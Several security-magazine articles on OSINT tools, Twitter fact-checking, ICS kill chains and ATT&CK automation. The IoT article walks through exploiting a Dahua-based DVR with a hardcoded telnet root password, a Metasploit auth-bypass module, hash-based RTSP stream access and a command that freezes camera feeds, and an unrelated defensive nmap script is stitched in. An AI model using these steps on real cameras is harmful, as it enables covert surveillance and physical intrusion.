$ python3 nexfil.py -u user1 -d 8.8.8.8

Similarly, you can increase the timeout if websites are not responding fast enough. By default, the timeout is set to 20
seconds, which should work, but otherwise you can set the value yourself:

$ python3 nexfil.py -u user1 -t 40

NExfil displays the settings used in a session before it begins processing:

UPDATES

Updating NExfil is super simple: head over to the directory where you cloned the project and execute:

$ git pull

and it will be updated automatically. NExfil will also notify you about new versions if one is available, so you will know
when to update.

FUTURE OF THE TOOL

Currently, I am focused on the core functionality of the tool, i.e. speed with accuracy and low amounts of false positives.
Along the way, I plan on adding more websites to expand the arsenal of NExfil. If you have any suggestions or if you want to
get some websites added to the tool then feel free to head over to GitHub and contribute.

TWITTER OSINT USING TINFOLEAK AND REVERSE IMAGING

JEFF MINAKATA

Trained in CEH8 and CEH9, CISP, Metasploit certified, Accredited Certified Engineer (ACE), and CWA certified. Over
20 years’ experience in the IT industry. Online instructor for OSINT, ethical hacking, and network security. Has contracted
courses for EC-Council and has written articles for Hakin9 and eForensics magazine. keyboardkomando@protonmail.com

34
Twitter OSINT using Tinfoleak and reverse imaging

In this article, we will talk about using OSINT for Twitter investigations. We will break this up into two sections: the
first is information collection on Twitter and the second is verification of that information.

To follow along with this article, you will need a web browser and an internet connection. We will be using browser based
tools for this tutorial.

The goal of this article is to understand how we can leverage online tools to collect information on Twitter users, and to
give some tips on analyzing a post that may be misleading.

The website that we will be using is TINFOLEAK (see the On the Web section for the link). This site will help us collect a
variety of information from our target’s Twitter account all in one place.

The site’s operation is pretty simple. If we scroll down to the bottom, we can enter the target’s Twitter handle right after
the @; in this example we are using Hakin9. Next, we need to enter an email address for the report to be sent to (the site
claims that you will not be spammed or have third parties involved). Finally, we need to solve the CAPTCHA and click the
Send button.

Once this is done you will see a confirmation at the top that you will receive your report by email. This can take several
minutes. If you do not see an email after 15 minutes or so, check your spam folder.

You will receive an email from the site containing the IP of the requester and the URL to check the results of the scan.

Once we click our custom link, we are presented with a wealth of information on our target in an easy-to-read format:
account creation date, Twitter ID number, location, geolocation (if enabled), tweets, mentions, likes, metadata, etc.

With the information we obtain through TINFOLEAK we can easily pivot our investigation, following up on followers
and posts, isolating posts and likes by date and time, and more. We can also see from our report that an Apple
computer was used on 2014/07/24 at 14:17:26.

Another common problem with performing OSINT on Twitter is the authenticity of the post. In this example we see a
fairly recent post claiming that Joe Biden had his Ukraine compound raided by Delta Force. Some of these Twitter posts
included an image of the supposed Delta Force team during their raid.

Most likely, the previous Twitter post is referencing this “news” story that shows a Delta Force team raiding a compound
with their night vision goggles. By performing a Google search for “Joe Biden compound raided by delta force” we can find
this article. We can also see that the date stamps are pretty close to the Twitter post date.

By running a reverse image search we can see whether that image was used somewhere else. Using a service such as Google
Images, we can upload the image and see what we find.

Right away we can see that the supposed image was from the movie Zero Dark Thirty! The images are an exact match to the
movie’s promo images, not from a real-life raid.

If we continue our reverse image search and keyword search, we can see that almost exactly the same story was reported
back in 2017; however, it was Obama’s stronghold in Thailand. The images and content are an almost exact copy, word for
word, of the Biden story.

Furthermore, using fact-checking sites such as Snopes, we can easily enter our keywords and see whether there are any
results. In this case, we see that Snopes has already debunked this story.

In our final example we take a look at a Twitter post made the day of the Capitol riots. This individual, who would later be
identified as the “QAnon Shaman”, was quickly noticed among the crowd that stormed the Capitol. Not long after this
individual was noticed, stories began to circulate that they were a provocateur from BLM, sent to storm the Capitol under
the guise of a Trump supporter. The Twitter post above shows the split images; the one on the left makes it appear he is at a
BLM rally in support of it. In fact, if we try clicking the image on the left, we see that the image is cropped at that point.

Once again, if we do a reverse image search, we can search for the original image. In this case we are able to find the full,
uncropped image along with the sign they are carrying. We can see clearly that it is not in support of BLM, but rather a
message that “Q” sent them.

Continuing our reverse image search, we can find a video in which the individual states they are at the rally to support
Trump and Q theory. This goes to show how easily a simple cropped image can be twisted to represent something very
different, and we need to always be sure to verify our information.

CONCLUSION:

Social media OSINT is constantly expanding, with so many new ways for people to communicate constantly being
introduced. Twitter, with its some 192 million active daily users, is still a very viable place to collect your OSINT
information. Leveraging tools such as Tinfoleak, and also employing reverse image searching and keyword searches, can help
not only identify more about your target, but also verify the incredible amount of information that floods the platform,
including false and misleading posts.

On the Web:

1. https://tinfoleak.com

2. https://www.google.com/imghp?hl=EN

3. https://www.bing.com/images/

4. https://www.snopes.com

HACKING IOT WITH IOT

DANIEL W. DIETERLE

Daniel W. Dieterle, aka “CyberArms”, has been in the computer industry for over 20 years, and has worked as a security
author, researcher & consultant. He has authored six books based on Kali Linux, and is currently working on his seventh,
“Advanced Security Testing with Kali Linux”. Daniel also runs two tech blogs - cyberarms.wordpress.com &
DanTheIOTMan.com

45
Hacking IoT With IoT

IoT (Internet of Things) vs IoT - reminiscent of the old Mad Magazine “Spy vs Spy” cartoon where two
identical-looking cartoon spies of different colors were always trying to kill each other. The number of vulnerable deployed
IoT devices and the offensive use of IoT devices are both skyrocketing. In this article, we will cover attacking an IoT device,
an office building security camera system, with another IoT device, a Raspberry Pi.

IOT DEVICES - WHAT ARE THEY?

An IoT device is a physical device with intelligence (sensors, data collection, monitoring) that communicates with other
devices over the network. IoT devices include security systems, smart appliances (online TVs, refrigerators, coffee makers,
etc.), building and machine control, monitoring devices, scanners, and sensor arrays that are accessible over the Internet.
Many “Maker” boards like the Raspberry Pi and Arduino are also used frequently in IoT applications. For this article, we
will specifically focus on the Raspberry Pi and a Smart Camera security system.

VULNERABLE SYSTEMS - WHAT PEOPLE DON’T UNDERSTAND

IoT devices are so popular because they bring online connectivity and monitoring to almost every industry. The big
problem, and what people don’t understand, is that there is a mini web server hiding inside them, and it is usually Linux
based. Once an IoT device is deployed, it often gets forgotten. It just sits on the wire, collecting or monitoring, and
usually not getting updated. Security monitoring of IoT devices is still fairly uncommon in the business world, and as we
say jokingly in the Red Team world, “they don’t make anti-virus for refrigerators”. This makes them a prime target for
unethical hackers.

FINDING IOT DEVICES IN MERE SECONDS

Shodan.io makes finding deployed IoT devices worldwide effortless. By entering just a few keywords, Shodan will return
an almost endless list of connected IoT devices in seconds. Online security systems, video cameras, building control
devices, and monitoring devices can be located almost instantly by entering the right search phrases. This is usually just the
manufacturer’s name or the server software that they are running. In most circumstances, you can see what software a
target is running, what ports are open, and its geographical location. Shodan sometimes even lists CVEs for known
vulnerabilities.

The free Shodan account is pretty limited. If you have a registered Shodan account (great membership sales usually around
the major US holidays!) you can use the full set of search filters and can access a lot more returns. For example, using the
search filter, “has_screenshot:true” returns almost a million and a half online devices of which Shodan was able to
take a screenshot. This includes industrial, building, security, and monitoring devices. It also includes VNC and remote
access sessions and lots of cameras!

Hackers use Shodan frequently, but security teams and companies also heavily use Shodan. For example, a company can
quickly see what devices they have publicly exposed with a few filter-keyword searches. Shodan’s professional monitoring
services are also a huge asset for protecting companies.

HACKING WITH IOT

IoT devices aren’t just targets; with the rise of powerful “Single Board Computers”, they are increasingly being used as
offensive security devices. The offensive security world is in love with them. To borrow a term from the military, we see IoT
devices as “Dual Use Tech” - meant for one thing, but able to be repurposed and “weaponized”. The Raspberry Pi (RPi) is
very popular in the security community. With very little effort it can run a full install of the popular pentesting platform
Kali Linux. They are also actively being used as drop boxes and stealthy “sniffer” devices - hacker implant devices that are
left behind on a target site, either collecting information or allowing an attacker remote access to the internal network,
sometimes both! Lastly, they are used as physical security attack devices. Software like P4wnP1 turns an unassuming Pi0W
(Raspberry Pi Zero W) into an air-gapped USB attack device.

In this article, we are going to see how easy it is to exploit and take over a vulnerable DVR security camera system using a
Raspberry Pi 4/400. I will be using a professional building/office DVR that controls four wired Power over Ethernet (PoE)
cameras. In preparing this article, I used both Kali Linux and Raspberry Pi OS (RasPi OS) on the RPi. The tools used work
equally well on both, though it is much easier to remotely view camera feeds with RasPi OS.

So, let’s get started!

Preparing The Raspberry Pi

You can run a full install of Kali Linux on the RPi. It is very easy to install and for the most part is 100% identical to the
desktop version, though some tools don’t run on ARM. Whether you choose Kali or RasPi OS, the install is identical.
Download the operating system of your choice from the developer’s website, write it to a MicroSD card, insert it into the Pi,
attach peripherals and lastly, power up. The system will boot into a graphical desktop of the OS you chose! It is literally
that easy.

We only need Nmap, Telnet and the Metasploit Framework on the RPi. These come pre-installed on Kali, so you are all set.
All three tools need to be installed if you choose RasPi OS.

Nmap Install: sudo apt install nmap

Telnet Install: sudo apt install telnet

Metasploit Install:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

That’s it, we are now good to go! The directions for either Kali Linux or RasPi OS are identical from here on out.

PORT SCAN AND IDENTIFY TARGET

As with any regular engagement, the first step is to recon your target. It is no different when dealing with IoT devices. A
quick Nmap scan will tell us everything we need to know.

Open a Terminal and enter, “nmap [target_IP] -A”

Now, one thing that is very interesting here is the HTTP and RTSP server services that are running. Notice it is running
Dahua services. This security system is NOT a Dahua brand, it is from a completely different manufacturer, but it is
running Dahua services. If we Google for “Dahua exploit”, we get almost 260,000 search returns, multiple CVEs and
several interesting articles.

Including this Forbes Article1:

“Millions of Chinese-made cameras can be hacked to spy on users” - well, that doesn’t sound good. If we read through some
of the other articles, it gets even more concerning. Apparently, several Dahua systems had telnet passwords hard coded into
the firmware. According to the Dahua Wiki2, the telnet root password could be “vizxv” (yikes) or no password (double
yikes). But no worries, the Dahua Wiki tells you how to reset this back to “admin”.

A simple five lowercase letter password for the unit’s built in root account? It can’t be that easy - let’s try it!

And we are in! I now have remote root access to the security system. Thank you for tuning in, I hope you enjoyed this
article! Okay, just kidding, there is more! At the end of the article, I will show you something very interesting that you can
do while logged in as root. For now, I just want to view the security camera feeds from the unit.

After a little analysis of the unit, I found that the attached PoE cameras were on a subnetwork of the DVR system. So
basically, the DVR acted as a DHCP and streaming server for the wired cameras. It then took the camera streams and
streamed them to the client software running on remote computers. What was interesting, though, is that the client viewer
software had a different username/password combination for viewing the cameras. You can’t view the camera feeds using
the root password.

The DVR itself only has a single user account, “root”:

So, how do we access the camera feeds?

METASPLOIT’S DAHUA EXPLOIT MODULE

Metasploit to the Rescue - the Metasploit Framework has a module specifically for Dahua security systems. Let’s check it
out!

Start Metasploit, “msfconsole”

Enter, “search dahua”

Type, “info 0” to pull up the info page for the Dahua DVR module.

This looks like it could be very useful:

Let’s try this module out!

Enter, “use 0”

Or, you could type the long version, “use auxiliary/scanner/misc/dahua_dvr_auth_bypass”, but since
we already searched for it, you can select it by its search return ID number.

Next, enter, “set RHOSTS [Target_IP_Address]”

Lastly, enter “user”

The Metasploit module runs with the “user” option and pulls the user information from the DVR.
We now have three video client users and their password hashes! Now, you could try to crack the passwords with John the
Ripper, but there is no need. If you read through the CVEs for Dahua, you will find that on some models, entering the
password hash is the same as entering the password!

GRABBING THE VIDEO STREAM

We now have everything we need to watch the video feed remotely. The Dahua Wiki3 describes how to connect to the
cameras using the RTSP protocol. We just need a client that can play the video. RasPi OS already has VLC Media Player
installed, so we can use that.

Start the VLC Media Player

Click “Media” on the main menu

Click “Open Network Stream”

Enter:

rtsp://admin:csSWCxV1@172.24.1.165:554/cam/realmonitor?channel=1&subtype=0

Here we are using the username and the password hash. Channel 1 is the DVR, and subtype is the camera number; if you
increment the camera number, you can see the additional cameras (four on this system).

In VLC Viewer, hit “Play”

We have a live remote security camera feed without ever logging into the device. Better yet, it is running on a Raspberry Pi!

SPY TIME - MAKING THE CAMERA DISPLAY AN OLD IMAGE

Everyone has seen the espionage movies where the ninja spy hacks into the security camera system and makes it display an
old image, so the spy can sneak into the protected area undetected. You can do that with this model camera too! Remember
when I said that the DVR acts as a DHCP server for all the connected cameras? What happens to the camera feed if I log
into the DVR as the Root user and down the network interface for the cameras?

The crazy thing is that it is silly easy to do with this model system.

After logging into the DVR as root, enter, “ifconfig eth0:poe down”

That is literally it. The images on the local DVR display and in the VLC viewer on the RPi stay up for about 5 seconds and
then disappear. But the last image recorded seemed to remain on the manufacturer’s Viewer Client software indefinitely!

So, if you were watching the manufacturer’s client software, a bad guy could theoretically shut down the cameras, sneak
into the camera view above, take the book and run, and no one would ever see it, lol!

The camera network interface and feeds can be brought back up with the “netinit” command.

DEFENSE

This is all very concerning, especially since it can all be done using a $35 Raspberry Pi. How can it be defended
against? Simple: update the firmware on all your internet-connected devices! Dahua has provided fixes and updates for all
the vulnerabilities mentioned in this article. Also, the individual maker of the DVR covered in this article has gone out of
business, permanently disabling the client software that had the “spy display” image issue.

I can’t stress enough how important it is to keep your online devices updated and to use long, complex passwords. It is
extremely easy to find vulnerable systems online in seconds. Hackers are actively scanning and looking for them. So, it is
best to make a policy to regularly check for updates for all your internet-connected devices. Be safe out there!
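As an added example (not from the article or its tools), the same Nmap reconnaissance turned to the defender's side: parse an nmap -oX export of your own network and flag hosts exposing Telnet, RTSP or a service Nmap attributes to Dahua, so they can be prioritised for the firmware updates recommended above. The XML sample, addresses and product strings are constructed for the demo.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Dict, List

# Exposures the article demonstrates on the DVR: a reachable Telnet service
# (built-in root account) and RTSP, plus anything Nmap's -A service detection
# attributes to Dahua.
RISKY_PORTS = {
    23: "Telnet exposed (built-in root account reachable)",
    554: "RTSP camera stream exposed",
}
RISKY_VENDORS = ("dahua",)


@dataclass
class Service:
    port: int
    name: str
    product: str


@dataclass
class Finding:
    addr: str
    port: int
    reason: str


def parse_nmap_xml(xml_text: str) -> Dict[str, List[Service]]:
    """Map each IPv4 host to its open TCP services from an `nmap -oX` export."""
    hosts: Dict[str, List[Service]] = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        services: List[Service] = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                     # closed/filtered ports are not exposures
            svc = port.find("service")
            services.append(Service(
                port=int(port.get("portid", "0")),
                name=svc.get("name", "") if svc is not None else "",
                product=svc.get("product", "") if svc is not None else "",
            ))
        hosts[addr_el.get("addr", "")] = services
    return hosts


def flag_exposures(hosts: Dict[str, List[Service]]) -> List[Finding]:
    """Flag every open service that matches a risky port or a risky vendor string."""
    findings: List[Finding] = []
    for addr, services in hosts.items():
        for svc in services:
            if svc.port in RISKY_PORTS:
                findings.append(Finding(addr, svc.port, RISKY_PORTS[svc.port]))
            elif any(v in svc.product.lower() for v in RISKY_VENDORS):
                findings.append(Finding(addr, svc.port,
                                        f"{svc.name} service attributed to Dahua; check firmware level"))
    return findings


# Constructed sample export (not the article's scan): a DVR-like host and an
# ordinary web server, using RFC 5737 documentation addresses. The product
# strings are illustrative, not Nmap's real fingerprint names.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Dahua DVR httpd"/></port>
      <port protocol="tcp" portid="554"><state state="open"/><service name="rtsp" product="Dahua DVR rtspd"/></port>
      <port protocol="tcp" portid="8000"><state state="filtered"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.0.2.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https" product="nginx"/></port>
    </ports>
  </host>
</nmaprun>
"""


def audit(xml_text: str = SAMPLE_XML) -> List[Finding]:
    """Parse the export and return the prioritised list of exposed IoT services."""
    return flag_exposures(parse_nmap_xml(xml_text))


if __name__ == "__main__":
    for f in audit():
        print(f"{f.addr}:{f.port}  {f.reason}")
```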

If you want to learn a lot more about using Raspberry Pi for Offensive Security, check out my book, “Security Testing with
Raspberry Pi”, available on Amazon.com.

Resources and References

1. Zak Doffman, Aug 3, 2019, “Warning As Millions Of Chinese-Made Cameras Can Be Hacked To Spy On Users: Report”,
https://www.forbes.com/sites/zakdoffman/2019/08/03/update-now-warning-as-eavesdropping-risk-hits-millions-of-chinese-made-cameras/

2. Dahua Wiki - https://dahuawiki.com/images/2/28/IPC_Telnet_clear_old_config_file.pdf

3. Dahua Wiki - https://dahuawiki.com/Remote_Access/RTSP_via_VLC

RED TEAMING VIA ICS AND SCADA ADVERSARY TACTICS

ALEXANDROS PAPPAS

Alexandros Pappas BSc works as Security Incident Response at Epiq. Working for several big companies, he is responsible
for conducting Tactical Threat Intelligence with integrated solutions, and Incident Response. At the same time, the author
extends his knowledge in Purple Team Tactics, Penetration Testing and Red Teaming. Additionally, he is a contributor to
the GHDB with 300 dorks published. Highly motivated and passionate about security, he can be reached via email at
pappasvar@gmail.com

57
Red Teaming via ICS and SCADA Adversary Tactics

INTRODUCTION

Industrial Control Systems (ICSs) are embedded cyber-devices that operate critical infrastructures (e.g., energy,
transportation, water, oil, etc.). ICS devices are less well known and are typically unique to the Operational Technology
(OT) side of cyber, which differs from enterprise Information Technology (IT). Cyber-threats in ICSs manifest themselves
in different ways. Cyber attacks on industrial control systems (ICSs) differ in impact based on a number of factors,
including the adversary’s intent, their sophistication and capabilities, and their familiarity with ICS and automated
processes. Generally speaking, cyber attackers target these ICS environments via a campaign of attempts that gains access
and provides enough information to produce an effect. However, the most important point when it comes to ICSs is that
knowledge of the adversary’s operations can help defenders appreciate the attacker’s possible intent, level of sophistication,
capabilities and familiarity with the ICS, which together work to unveil the potential impact of the attack on an
organization.

DEFINITIONS AND TERMINOLOGY

PowerShell: is a task automation and configuration management framework from Microsoft, consisting of a
command-line shell and the associated scripting language. Initially a Windows component only, known as Windows
PowerShell, it was made open-source and cross-platform on 18 August 2016 with the introduction of PowerShell Core. The
former is built on the .NET Framework, the latter on .NET Core.

ICS: In manufacturing, industrial control system (ICS) is a general term used to describe the integration of hardware and
software with network connectivity in order to support critical infrastructure.

SCADA: Supervisory control and data acquisition (SCADA) is a control system architecture that uses computers,
networked data communications and graphical user interfaces for high-level process supervisory management. The
operator interfaces that enable monitoring and the issuing of process commands, such as controller setpoint changes, are
handled through the SCADA supervisory computer system. However, the real-time control logic or controller calculations
are performed by networked modules that connect to other peripheral devices, such as programmable logic controllers and
discrete PID controllers, which interface to the process plant or machinery.

CYBER KILL CHAIN

The cyber kill chain is a series of steps that trace the stages of a cyberattack from the early reconnaissance stages to the
exfiltration of data. The kill chain helps us understand and combat ransomware, security breaches, and advanced persistent
threats (APTs). Lockheed Martin derived the kill chain framework from a military model – originally established to
identify, prepare to attack, engage, and destroy the target. Since its inception, the kill chain has evolved to better anticipate
and recognize insider threats, social engineering, advanced ransomware and innovative attacks.

Figure 1. Cyber Kill Chain model by Lockheed Martin.

ICS CYBER KILL CHAIN

The ICS Cyber Kill Chain provides structure and high-level visibility into what is going on in different attacks and how
the defenders can counter them with the right countermeasures in place. Due to the specific characteristics of the features
deployed on control systems and the unique configurations they present, carrying out a successful attack requires
considerable knowledge.

ICS CYBER KILL CHAIN STAGE 1 BREAK DOWN

Planning Phase

The first step of Stage 1 is the planning phase, where the objective is to reveal weaknesses and identify information that
supports attackers in their efforts to target, deliver and exploit elements of a system. This can be done via reconnaissance,
where attackers conduct research about the target using OSINT (Open-source intelligence) tools and searches of publicly
available data. By doing this, they are able to map a target’s publicly or privately accessible attack surfaces, discover
patterns of activity and determine versions of operating system software through routine queries.

Preparation Phase

The second phase of Stage 1 is preparation, which includes weaponization and/or targeting. Weaponization and targeting
can both take place, but both are not required. Weaponization includes modifying an otherwise harmless file, such as a
document, for the purpose of enabling the adversary’s next step. Targeting can also take place in the second phase and
occurs when the adversary or its agent (such as a script or tool) identifies potential victim(s) for exploitation. For example, if
there is an authenticated VPN (Virtual Private Network) directly connected to a SCADA environment, which is using
Windows 10 with PowerShell, then an attacker doesn’t necessarily need to weaponize the VPN and install any malware to
break in. Rather, just logging in and using the PowerShell environment, or trying different modifications via the PowerShell
environment, can allow an attacker to get in.

Cyber Intrusion Phase

This is the phase in which initial access is gained. An intrusion is any kind of attempt by the adversary, successful or
not, to gain access to the defender’s network, system, or environment. This includes the Delivery step, in which the
adversary uses a method to interact with the defender’s network, followed by the Exploit step, where the adversary uses it to
perform malicious actions.

Management and Enablement Phase

In this phase, attackers are able to establish command and control (C2), using methods such as a connection to the
previously installed capability or abusing trusted communications such as the VPN.

Sustainment, Entrenchment, Development, and Execution phase

In this last phase of Stage 1, attackers can act in various ways depending on their goal(s). This may
include the discovery of new systems or data, lateral movement around the network or environment, installation and
execution of additional capabilities, launching of those capabilities, capturing transmitted communications such as user
credentials, and the list goes on...

At this point, it must be underlined that Stage 1 most directly maps to what would constitute a breach in traditional IT
networks. It is important to highlight that this stage can be bypassed if defenders have Internet-facing ICS components or if
information about the ICS and process is obtained from a successfully compromised third party. Recent BlackEnergy 2/3
campaigns attempt to exploit susceptible Internet-facing devices. Understanding where an adversary is in his or her
campaign can enable defenders to make better-informed security and risk management decisions. By understanding the
inherent advantages of well-architected ICS networks and by understanding adversary attack campaigns against ICS,
security personnel can see that defense is doable.

With regards to Red Teaming ICS environments, the most challenging thing is that these environments differ greatly from
one another in variety, network components, architecture, technology, protocols, etc. In general, there is no commonality
between all ICS sites. For example, if an attacker wants to attack a substation of an electrical power grid in a specific area
of a country, they might have to use a different approach to attack another substation of the same grid in a different area of
the same country! Different vendors, different configurations, and different ways of being integrated make things very
challenging, and new approaches come into play to address this interesting field. In fact, Stage 1 refers to the point at which
the attacker understands the ICS environment well enough to impact it. In reality, it is more engineering than cyber work.


Figure 2. Cyber Intrusion Preparation and Execution - Stage 1. Stage 1 mimics a targeted and structured attack campaign.

ICS CYBER KILL CHAIN STAGE 2

So when it comes to causing any damage (physical or logical) or disruption, for example making the water go down or the
oil stop, we are referring to ICS Cyber Kill Chain Stage 2. In Stage 2, attackers need to develop an understanding of the
target in order to carry out the attack, and usually a capability specific to that ICS. At some point, however, this capability
has to be tested. Since these environments are so different, knowledge and capabilities must be tested, especially for
large-scale attacks and for the effects we are most concerned about. The ICS Attack phase of Stage 2, which includes
Delivery, Install/Modify and Execute ICS Attack, means that the attacker must know more and more about the whole ICS
environment, which is what makes those environments the most defensible on earth.

Attack Development and Tuning

The first phase of Stage 2 is the Attack Development and Tuning where the attacker develops a new capability tailored to
affect a specific ICS implementation and for the desired impact.


Validation

In this phase, the attackers must test their capabilities on similar or identically configured systems if the capability is to
have any meaningful and reliable impact. Additionally, for more significant impacts, significant testing may occur in which
the adversary may acquire physical ICS equipment and software components.

ICS Attack

The last phase of Stage 2 is the ICS Attack, where the adversary will deliver the capability, install it or modify existing
system functionality, and then execute the attack. The attack may have many facets (preparatory or concurrent attacks) that
fall into the attack categories of enabling, initiating or supporting to achieve their ultimate effect.

Figure 3. ICS Attack Development and Execution - Stage 2. Stage 2 shows the steps associated with a material attack that requires high
confidence.

ADVERSARY TACTICS - USE CASES

Havex

Havex did not rely on any 0-day exploits or anything of that kind. The Havex malware had two primary components: a RAT
and a C2 server written in PHP. Havex also included an OPC (Open Platform Communications) scanning module used to
search for industrial devices on a network. The OPC scanning module was designed to scan for TCP devices operating on
ports 44818, 105 and 502, where these ports are common to ICS/SCADA vendors such as Siemens and Rockwell Automation.
By abusing the OPC protocol, Havex mapped industrial networks once inside victim systems. The OPC scanning module


only operated on the older DCOM-based (Distributed Component Object Model) OPC standard and not the more recent
OPC Unified Architecture (UA). Havex joins the category of ICS tailored malware because it is written to conduct
information gathering on these specific systems. Havex also exploited supply chain and watering-hole attacks on ICS
vendor websites in addition to spear phishing campaigns to gain access to victim systems. The watering-hole and supply
chain attacks were twofold in methodology. In the first method, victims were redirected from legitimate vendor websites to
corrupted pages containing the Havex malware. In the second method, the attackers compromised vulnerable vendor
websites and corrupted legitimate software to inject the Havex RAT. Users would then unknowingly download the malware
when downloading otherwise legitimate software from vendor websites. This method allowed the malware to bypass
traditional security measures because software was downloaded by users with authorization to install programs onto the
network. Known compromised vendors were MESA Imaging, eWON/Talk2M, and MB Connect Line. While the attack
vectors were aimed at business networks, the lack of robust air gaps in many ICS environments could allow malware like
Havex to jump easily from business networks to industrial networks and infect ICS/SCADA equipment. Havex, like other
backdoor malware, also allows for the injection of other malicious code onto victim devices. Specifically, Havex was often
used to inject the Karagany payload onto compromised devices. Karagany could steal credentials, take screenshots, and
transfer files to and from Dragonfly C2 servers.

Figure 4. HAVEX ICS Cyber Kill Chain.


Figure 5. Pre-Havex and Post-Havex scanned ports, where these ports are common to ICS/SCADA companies such as Siemens and Rockwell
Automation.

BlackEnergy 2 and 3

BlackEnergy malware, on the other hand, was first reported in 2007 as an HTTP-based toolkit that generated bots to
execute distributed denial-of-service attacks. In 2010, BlackEnergy 2 emerged with capabilities beyond DDoS (Distributed
Denial-of-Service). In 2014, BlackEnergy 3 came equipped with a variety of plug-ins. A Russian-based group known as
Sandworm (aka Voodoo Bear) is attributed with using BlackEnergy in targeted attacks. The attack is distributed via a Word
document or PowerPoint attachment in an email, luring victims into opening the seemingly legitimate file.

BlackEnergy 2 used sophisticated rootkit/process-injection techniques, robust encryption, and a modular architecture
known as a "dropper". This decrypts and decompresses the rootkit driver binary and installs it on the victim machine as a
server with a randomly generated name. As an update on BlackEnergy 1, it combines older rootkit source code with new
functions for unpacking and injecting modules into user processes. Packed content is compressed using the LZ77 algorithm
and encrypted using a modified version of the RC4 cipher. A hard-coded 128-bit key decrypts embedded content. For
decrypting network traffic, the cipher uses the bot's unique identification string as the key. A second variation of the
encryption/compression scheme adds an initialization vector to the modified RC4 cipher for additional protection in the
dropper and rootkit unpacking stub, but is not used in the inner rootkit nor in the userspace modules. The primary
modification in the RC4 implementation in BlackEnergy 2 lies in the key-scheduling algorithm. The latest full version of
BlackEnergy emerged in 2014. The changes simplified the malware code: this version's installer drops the main dynamically
linked library (DLL) component directly to the local application data folder. This variant of the malware was involved in
the December 2015 Ukraine power grid cyberattack.


Figure 6. BlackEnergy 2 & 3 ICS Cyber Kill Chain.

RECOMMENDATIONS FOR BETTER ICS RED TEAMING

The most important point when it comes to Red Teaming ICS environments is safety and reliability. These two key points
are paramount, and they require coordination. This simply means that the people who are going to take actions need to
communicate very well with each other. This applies to both Red and Blue Teams during a Red Team ICS engagement,
where the Red Team has to test the Blue Team and its detection and response capabilities. For example, from the Red
Team’s point of view, the key questions that deserve a lot of attention would be whether the Blue Team can see the activity,
for how long, what exactly they can see, and how they can respond effectively to an ICS Red Teaming engagement. As far as
the Blue Team is concerned, the valuable information for them would be whether they could detect all those actions mapped
in Stage 1 of the ICS Cyber Kill Chain, as mentioned above. Then, based on this information, they could extend their
knowledge and build more confidence in their detection capabilities.

So, in fact, Stage 1 is often very similar to IT hacking with the intent of learning ICS details, whereas Stage 2 is often about
learning the ICS and using it against itself. Another recommendation of great value is to start a Red Teaming engagement
in the ICS as a tabletop exercise. Last but not least, it is very important to find a lab network if possible, or to work during
maintenance periods, and to test the defenders as much as you test the architecture and passive defenses. Additionally, as
always in such situations, offense informs defense.

To sum up, the above-mentioned ICS Cyber Kill Chain is a model that builds upon the traditional understanding of a Cyber
Kill Chain and tailors it to adversary attacks on ICS. The model provides defenders an opportunity to better understand the
phases of an adversary’s campaign into an ICS to identify opportunities for detection, remediation and defense. These
opportunities for success also highlight that ICS networks are more defensible than traditional IT networks and stress the
importance of maintaining this defensible architecture through actions such as limiting the integration of safety systems
with operations networks and removing ICS components from direct Internet access.

AUTOMATING THE MITRE ATT&CK WITH PYTHON

BRUNO RODRIGUES

Creating a better world through technology is now a lifetime mission of the author. He hopes you can join him in creating a safer e-one.

68
Automating the Mitre Att&ck with Python

INTRODUCTION

I’m a firm believer that we cannot continue doing cyber security the way we do it today - not enough time, not enough
resources. It’s a lost war. Attacks are getting more sophisticated, bad hackers are becoming more advanced, techniques more
elaborate. Security, or cyber security if your concern is with the attacks, will require a lot more automation than is currently
implemented.

In this article, I’ll focus on the Mitre Att&ck. Why? Because it’s a trending subject and because it’s the perfect example of
what I said. If you look at the picture below, you’ll see that this framework covers a multitude of threats, technologies, and
attacks, making it a daunting task to keep organizations protected.

Our goal today is to get you, the reader, on the right track to automate the attack as a form of defense. Look at this simple
scenario – you and your team oversee implementing security to protect against the techniques catalogued in the Mitre
Att&ck framework. You start by deciding on which vendors to implement, and there are a lot. This article will not focus on
what you choose to protect yourself with.

Nevertheless, during a PoC phase, or after you implement the chosen solutions, you decide to test their efficiency. You do it
because you want to understand what weaknesses remain, because you have a red team, or just because you’re evaluating
multiple solutions at once. Looking at the above picture, you quickly realize you are understaffed and do not have enough
time to test properly.

The only option would be, in a certain way, to automate the multiple attacks that you need to constantly run against your
perimeter. You probably know how fast and easily the perimeter changes, mutates, or becomes vulnerable. This is the


journey path I’m taking you on, using our good friend Python and programming a couple of real attacks. This will be your
starting point.

CONCEPTS

Before we proceed, we need to discuss a couple of concepts. Every good piece of software is a piece of art. As any piece of
art, it needs a structure. This structure will guide us through developing choices and make us consistent on what we
produce, making sure our goals are reached.

Use the proper tools!

Let me put this plain and simple – don’t reinvent the wheel. There are a lot of tools out there that will allow us to be
successful in our Mitre journey. We don’t need to code the tools we need from scratch. We just need to run them properly
and in a consistent way.

In this article, I’ll be using Kali Linux as my base OS. Meaning, what I’ll develop will run on Kali Linux, allowing us to take
advantage of the vast arsenal of tools available there. Although it’s not the goal of this article to explain how to deploy Kali
Linux in a production environment, you’ll need to decide where you want to run it – on your laptop, in the cloud, etc. I found
myself with some problems in running Kali on a Windows Server 2019 WSL 2. My goal was to have something in the cloud
that would allow me to run it continuously. Nevertheless, there’s something wrong with the deployment and I was unable to.
You can check it out here - Install the Linux Subsystem on Windows Server | Microsoft Docs.

In our example, we are going to stay with tools from the first part of the Framework – Reconnaissance, but I’ll let the reader
take it from here and use your skills and imagination to move to every category and every technique. The larger your testing
goes, the safer your network will be.

Interaction with tools

